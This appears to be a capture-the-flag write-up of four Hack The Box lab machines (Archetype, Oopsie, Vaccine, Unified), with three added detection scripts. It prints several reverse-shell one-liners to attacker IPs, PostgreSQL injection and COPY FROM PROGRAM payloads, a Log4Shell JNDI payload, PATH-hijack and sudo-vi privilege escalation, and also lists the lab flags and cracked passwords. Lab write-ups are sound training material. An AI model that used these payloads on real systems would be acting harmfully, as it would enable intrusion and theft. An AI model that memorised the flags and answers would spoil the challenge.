# Tier 0



# Tier 1





# Tier 2
## Archetype
### Task 1: Which TCP port is hosting a database server?
Using the command line `nmap -A --top-ports 1000 10.129.95.187 -T 4 -vv` to scan ports. The result looks like this:

**A: 1433**
### Task 2: What is the name of the non-Administrative share available over SMB?
Using `smbclient` to connect to the samba file server and drive transactions from the terminal.
`smbclient -L \\10.129.134.197`
Option `-L` lists all shared resources on the server at this IP address.

**A: backups**
### Task 3: What is the password identified in the file on the SMB share?
After connecting to the server using user `backups`, list all files and download the file.

I `cat` this file and got the password (from the database configuration file).
**A: M3g4c0rp123**
### Task 4: What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
**A: mssqlclient.py**
Install `Impacket`.

Check if it has been installed successfully.

### Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Searching on Google:

Try it out on my terminal.

**A: enable_xp_cmdshell**
### Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
Searching on Google:

**A: WinPEAS**
### Task 7: What file contains the administrator's password?

Listening on port 4444 to get a reverse shell.
My IP is `10.10.16.38`; then I used the [Reverse Shell generator](https://www.revshells.com/) to get the PowerShell command line.

After running it like this:

We get the shell.

Download `WinPEAS` from https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
I will host a local server; the target machine will download winPEAS from my server and run it, and then I can exploit the target machine.


Result:

**A: ConsoleHost_history.txt**
### Submit user flag
Get the content of the previous file.

Using the script `psexec.py` from the Impacket collection to get RCE on the Windows machine with the user and password.
Checking all directories and files in Users, I found the file with the user flag at `C:/Users/sql_svc/user.txt`.

**A: 3e7b102e78218e935bf3f4951fec21a3**
### Submit root flag
Similar to the previous case, I found the root flag under the Administrator user.
**A: b91ccec3305e98240082d4474b848528**


## Oopsie
### Task 1: With what kind of tool can you intercept web traffic?
**A: proxy**
### Task 2: What is the path to the directory on the webserver that returns a login page?
Check the source code of the main page.

I can see a link to the source script of the login page:
**A: /cdn-cgi/login**
### Task 3: What can be modified in Firefox to get access to the upload page?
**A: cookie**
### Task 4: What is the access ID of the admin user?
First, log in as guest.
The URL of this account is `http://10.129.61.177/cdn-cgi/login/admin.php?content=accounts&id=2`.
Guessing by changing the `id` parameter to 1:

**A: 34322**
### Task 5: On uploading a file, what directory does that file appear in on the server?
Changing the access ID in the cookie to the admin's access ID to get admin privileges.

Using gobuster in directory/file enumeration mode to list all directories and files.


**A: /uploads**
### Task 6: What is the file that contains the password that is shared with the robert user?
I noticed that this website uses PHP as the backend language, so we can assume that uploading a PHP shell can give access to the system.
Create PHP code for a reverse shell from the target machine.

Listening on port 4444...

Upload the shell file to the website.




Check the directory `/var/www/html` (the default location for storing website files that are served to users over the web).
I found the file `db.php`, which contains robert's password.

**A: db.php**
### Task 7: What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?

I found a post in StackExchange.

**A: find**
### Task 8: Regardless of which user starts running the bugtracker executable, which user's privileges will it use to run?
Using `ls -la` in the `/usr/bin` directory.

**A: root**
### Task 9: What does SUID stand for?

**A: Set owner User ID**
### Task 10: What is the name of the executable being called in an insecure manner?
Identified that user `robert` belongs to group `bugtracker`, and users in this group can execute the binary `bugtracker`.

Using `python3 -c 'import pty; pty.spawn("/bin/bash")'` to upgrade the reverse shell to a proper terminal.
Run the `bugtracker` file and provide an ID from 1 to 4; when id=4:

We can see that the `cat` command is executed without root privileges.
### Submit user flag

**A: f2c74ee8db7983851ab2a96a44eb7981**
### Submit root flag

Can't access root.
```bash
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH
/usr/bin/bugtracker
```

**A: af13b0bee69f8a877c3faf667f7beacf**
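A defender's audit for the weakness in this binary, added here as an example and not taken from the writeup: it pulls printable strings out of a file the way `strings` does and flags shell command strings that name a program without an absolute path, which is what lets the caller's `PATH` decide which `cat` a setuid-root binary runs. The function names and the sample bytes are constructed for this example; the fix on the binary side is to call `/bin/cat` by absolute path or reset `PATH` before invoking anything.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Printable ASCII runs of 4+ bytes, the same default threshold `strings` uses.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Program names a privileged binary typically hands to system()/popen().
_SHELL_WORDS = {"cat", "ls", "cp", "mv", "rm", "sh", "bash", "id", "whoami", "chmod", "chown"}

def extract_strings(blob: bytes) -> List[str]:
    """Pull printable strings out of raw file bytes."""
    return [m.group(0).decode("ascii") for m in _PRINTABLE.finditer(blob)]

def unqualified_commands(strings: List[str]) -> List[str]:
    """Strings whose first word is a shell command named without an absolute path.

    `cat /root/reports/` is flagged because PATH decides which `cat` runs;
    `/bin/cat /root/reports/` is not, since an absolute path ignores PATH.
    """
    return [s for s in strings if len(s.split()) >= 2 and s.split()[0] in _SHELL_WORDS]

def is_setuid_root(path: str) -> bool:
    """True when the file is setuid and root-owned: the case where a hit matters most."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0

def audit_binary(path: str) -> Dict[str, object]:
    """Combine the setuid check and the string scan for one file."""
    with open(path, "rb") as f:
        hits = unqualified_commands(extract_strings(f.read()))
    return {"path": path, "setuid_root": is_setuid_root(path), "unqualified": hits}

# Constructed sample: byte strings standing in for a small compiled helper.
SAMPLE_BLOB = (b"\x7fELF\x02\x01\x01\x00" + b"Provide Bug ID: \x00"
               + b"cat /root/reports/\x00" + b"/bin/ls -la /root/reports\x00")

def demo() -> Dict[str, object]:
    """Write the constructed sample to a temporary file and audit it."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(SAMPLE_BLOB)
    try:
        return audit_binary(tmp.name)
    finally:
        os.unlink(tmp.name)

if __name__ == "__main__":
    print(demo())
```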

## Vaccine
### Task 1: Besides SSH and HTTP, what other service is hosted on this box?
Using `nmap` to scan the top common ports with the command in the picture, the result found 3 ports: 21/tcp → FTP, 22/tcp → SSH, 80/tcp → HTTP.

**A: FTP**
### Task 2: This service can be configured to allow login with any password for a specific username. What is that username?
In Nmap's result, the FTP service shows `ftp-anon: Anonymous FTP login allowed`, which means user `anonymous` can log in without a password.
**A: anonymous**
### Task 3: What is the name of the file downloaded over this service?
Also in Nmap's result, we can see a zip file named `backup.zip`.
**A: backup.zip**
### Task 4: What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
**A: zip2john**
### Task 5: What is the password for the admin user on the website?
Download the backup file from the FTP server.

Using [John the Ripper](https://github.com/openwall/john) to crack the password.
YouTube link: https://www.youtube.com/watch?v=KzD1xxVt4cg&t=838s

Extracting this zip file and reading `index.php`, we can see the `session_start` like this:

Crack the MD5 hash to get the password:

**A: qwerty789**
### Task 6: What option can be passed to sqlmap to try to get command execution via the sql injection?
**A: --os-shell**

### Task 7: What program can the postgres user run as root using sudo?
Log in as the admin user with the password from Task 5.

Get the cookie to use with sqlmap.

Because I could not use sqlmap to get a shell, I exploited the SQL injection manually.
Get table information with:
`http://10.129.60.96/dashboard.php?search=%27%20UNION%20ALL%20SELECT%201,TABLE_NAME,table_schema,null,null%20FROM%20information_schema.tables;%20--a`
Following the tutorial on RCE via PostgreSQL injection:
`meta'; CREATE TABLE cmd_exec (cmd_output text);--a`

`meta'; COPY cmd_exec FROM PROGRAM 'id';--a`

`' UNION ALL SELECT null, cmd_exec.cmd_output,null,null,null FROM cmd_exec; --a`

`meta'; COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';--a`

Reverse shell:
Listening on port 4444
`/bin/bash -i >& /dev/tcp/10.10.16.38/4444 0>&1`

But an error happened, so I changed to another method.
Using nc-mknod:
`rm /tmp/l;mknod /tmp/l p;/bin/sh 0</tmp/l | nc <your_ip> <your_port> 1>/tmp/l'`
URL-encode it.
And GET (with the IP and port changed):
`http://10.129.95.174/dashboard.php?search=meta%27%20;%20COPY%20cmd_exec%20FROM%20PROGRAM%20%27rm%20%2Ftmp%2Fl%3Bmknod%20%2Ftmp%2Fl%20p%3B%2Fbin%2Fsh%200%3C%2Ftmp%2Fl%20|%20nc%2010.10.16.4%204444%201%3E%2Ftmp%2Fl%27;--a`
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```


Check `sudo -l`, but it needs the password of the postgres user.


`http://10.129.60.96/dashboard.php?search=' UNION ALL SELECT 1,pg_user.usename,pg_user.passwd,null,null FROM pg_user ; --a`

So, I check `pg_shadow` instead of `pg_user`.

Cracking the MD5 password hash, I got the plaintext password for this user.

Perform the reverse shell again and check `sudo -l` with the password `P@s5w0rd!`:

**A: vi**
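The server-side view of the injection chain above, as an added example that is not part of the original writeup: with `log_statement = 'all'` every statement the web app sends is logged, and a few rules over those lines pick out schema enumeration, stacked queries, `COPY ... FROM PROGRAM` and reads of `pg_shadow`. The log prefix format, table and database names, and the sample lines are constructed here; the rule names are my own.

```python
import re
from typing import Dict, List, Optional
# One PostgreSQL log line as written with log_statement = 'all' and a
# log_line_prefix of '%m [%p] %u@%d ' (assumption: adapt to your prefix).
_LINE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
                   r"LOG:\s+statement: (?P<sql>.*)$")
_ORDER = ["medium", "high", "critical"]
# COPY ... FROM PROGRAM runs an OS command as the server user; a web app's
# role should never be a superuser or a member of pg_execute_server_program.
_RULES = {
    "copy_from_program": (re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I | re.S), "critical"),
    "pg_shadow_read": (re.compile(r"\bpg_shadow\b", re.I), "high"),
    "schema_enum": (re.compile(r"\bUNION\b.*\binformation_schema\.", re.I | re.S), "medium"),
    "stacked_query": (re.compile(r"'\s*;\s*\w+.*--", re.S), "medium"),
}

def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = _LINE.match(line)
    return m.groupdict() if m else None

def classify(sql: str) -> List[str]:
    """Names of the rules the statement trips, in rule order."""
    return [name for name, (pat, _) in _RULES.items() if pat.search(sql)]

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """One alert per logged statement that trips at least one rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        hits = classify(rec["sql"]) if rec else []
        if hits:
            sev = max((_RULES[h][1] for h in hits), key=_ORDER.index)
            alerts.append({"pid": rec["pid"], "user": rec["user"], "severity": sev, "rules": hits})
    return alerts

# Constructed sample: the search box query as it would be logged when the
# app concatenates the `search` parameter into an ILIKE pattern.
_P = "2022-03-01 10:15:0{i}.000 UTC [2201] postgres@carsdb LOG:  statement: "
SAMPLE_LOG = [
    _P.format(i=1) + "SELECT * FROM cars WHERE name ILIKE '%meta%'",
    _P.format(i=2) + "SELECT * FROM cars WHERE name ILIKE '%' UNION ALL SELECT 1,TABLE_NAME,"
                     "table_schema,null,null FROM information_schema.tables; --a%'",
    _P.format(i=3) + "SELECT * FROM cars WHERE name ILIKE '%meta'; CREATE TABLE cmd_exec (cmd_output text);--a%'",
    _P.format(i=4) + "SELECT * FROM cars WHERE name ILIKE '%meta'; COPY cmd_exec FROM PROGRAM 'id';--a%'",
    _P.format(i=5) + "SELECT * FROM cars WHERE name ILIKE '%' UNION ALL SELECT 1,usename,passwd,null,null FROM pg_shadow; --a%'",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```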
### User flag

**A: ec9b13ca4d6229cd5cc1e09980965bf7**
### Root flag
Get root privileges:

```
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash
```

**A: dd6e058e814260bc70e9bbdef2715849**

References:
https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection
https://github.com/cwinfosec/revshellgen/blob/master/revshellgen.py
## Unified
### Task 1. Which are the first four open ports?

**A: 22,6789,8080,8443**
### Task 2. What is the title of the software that is running on port 8443?

**A: UniFi Network**
### Task 3. What is the version of the software that is running?

**A: 6.4.54**
### Task 4. What is the CVE for the identified vulnerability?
Researching this web application and its version, I found an article about the Log4j vulnerability in the UniFi software, which uses version 6.4.54. Versions prior to 6.5.54 are vulnerable to remote code execution.
References:
https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi
https://github.com/puzzlepeaches/Log4jUnifi
**A: CVE-2021-44228**
### Task 5. What protocol does JNDI leverage in the injection?
JNDI (Java Naming and Directory Interface) is a Java API that allows the application developer to retrieve objects based on a given name. JNDI supports different implementations like Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP) and others.
**A: LDAP**
### Task 6. What tool do we use to intercept the traffic, indicating the attack was successful?
**A: tcpdump**
### Task 7. What port do we need to inspect intercepted traffic for?
Using a Google search for the port of the LDAP service.

**A: 389**
### Task 8. What port is the MongoDB service running on?
First, install the tool from its git repo: [veracode-research/rogue-jndi](https://github.com/veracode-research/rogue-jndi)
> Make sure you have Maven and Java installed before attempting to compile this tool.

Install them with `sudo apt install openjdk-17-jdk` and `sudo apt install maven`.
One-line command to build:
```bash
git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package
```
Send the login request with the injection in the `remember` value:

The command line to create a reverse shell using Bash and base64-encode it:
```bash
echo 'bash -c "bash -i >& /dev/tcp/<ip_attacker>/<port_attacker> 0>&1"' | base64
```
Start the rogue-jndi LDAP server with the following command:
```bash
java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTcyLjMxLjIyMS4xNjEvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "<ip_attacker>"
```

Listen on port 4444 and send the request again.


**A: 27117**
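The indicator that the tcpdump check on port 389 relies on, written as a defender-side check over the login request itself (added example, not from the writeup or the rogue-jndi project): it walks every string in the JSON login body, finds JNDI lookups and reports the scheme, host and port the server would call back to, filling in the LDAP default of 389 when the URL gives none. The field names `username` and `password`, the callback address and port 1389 in the sample body are constructed for this example.

```python
import json
import re
from typing import Dict, List
from urllib.parse import urlsplit

# A literal JNDI lookup as Log4j 2.x resolves it: ${jndi:<scheme>://host[:port]/...}.
# Obfuscated lookups need normalising first; only the plain form is handled here.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<url>[a-z]+://[^}\s]+)", re.I)
# Ports the JNDI client falls back to when the URL gives none (LDAP is 389,
# the port the writeup watches with tcpdump).
_DEFAULT_PORT = {"ldap": 389, "ldaps": 636, "rmi": 1099}

def find_jndi(value: str) -> List[Dict[str, object]]:
    """Every JNDI lookup in one string, with the callback host and port it names."""
    out = []
    for m in _JNDI.finditer(value):
        u = urlsplit(m.group("url"))
        out.append({"scheme": u.scheme.lower(), "host": u.hostname,
                    "port": u.port or _DEFAULT_PORT.get(u.scheme.lower())})
    return out

def scan_login_body(raw: str) -> List[Dict[str, object]]:
    """Walk every string in a JSON login body (username, password, remember, ...)."""
    findings = []
    def walk(node, path):
        if isinstance(node, str):
            findings.extend({"field": path, **f} for f in find_jndi(node))
        elif isinstance(node, dict):
            for k, v in node.items():
                walk(v, f"{path}.{k}" if path else k)
        elif isinstance(node, list):
            for i, v in enumerate(node):
                walk(v, f"{path}[{i}]")
    walk(json.loads(raw), "")
    return findings

# Constructed sample body: field names follow the UniFi login form seen in the
# writeup; the callback address and port are placeholders.
SAMPLE_BODY = ('{"username": "admin", "password": "x", '
               '"remember": "${jndi:ldap://10.10.16.38:1389/o=tomcat}", "strict": true}')

if __name__ == "__main__":
    print(scan_login_body(SAMPLE_BODY))
```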
### Task 9: What is the default database name for UniFi applications?
**A: ace**
### Task 10: What is the function we use to enumerate users within the database in MongoDB?

**A: db.admin.find()**
### Task 11: What is the function we use to update users within the database in MongoDB?
**A: db.admin.update()**
### Task 12: What is the password for the root user?
Following the tutorial:

The shadow password hash for the admin account is:
`$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.`
Using John the Ripper to crack the hash:

Choose another password and hash it with the SHA-512 crypt algorithm:

Using this command to update the password:
```bash
mongo --port 27117 ace --eval 'db.admin.insert({ "email" : "winndy112@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "$6$arQSCCzNOg.PZvSN$TVuOE0YObPs0ZD.w40lCIACyly01gt6Md8buE3s0Aao6ltVXtYmPicdRBQTEsNhy1AZaKhGKeHP0UeOizhaTR." })'
```


**A: NotACrackablePassword4U2022**
Get the user flag and root flag.

### Submit user flag
**A: HTB{6ced1a6a89e666c0620cdb10262ba127}**
### Submit root flag
**A: HTB{e50bc93c75b634e4b272d2f771c33681}**

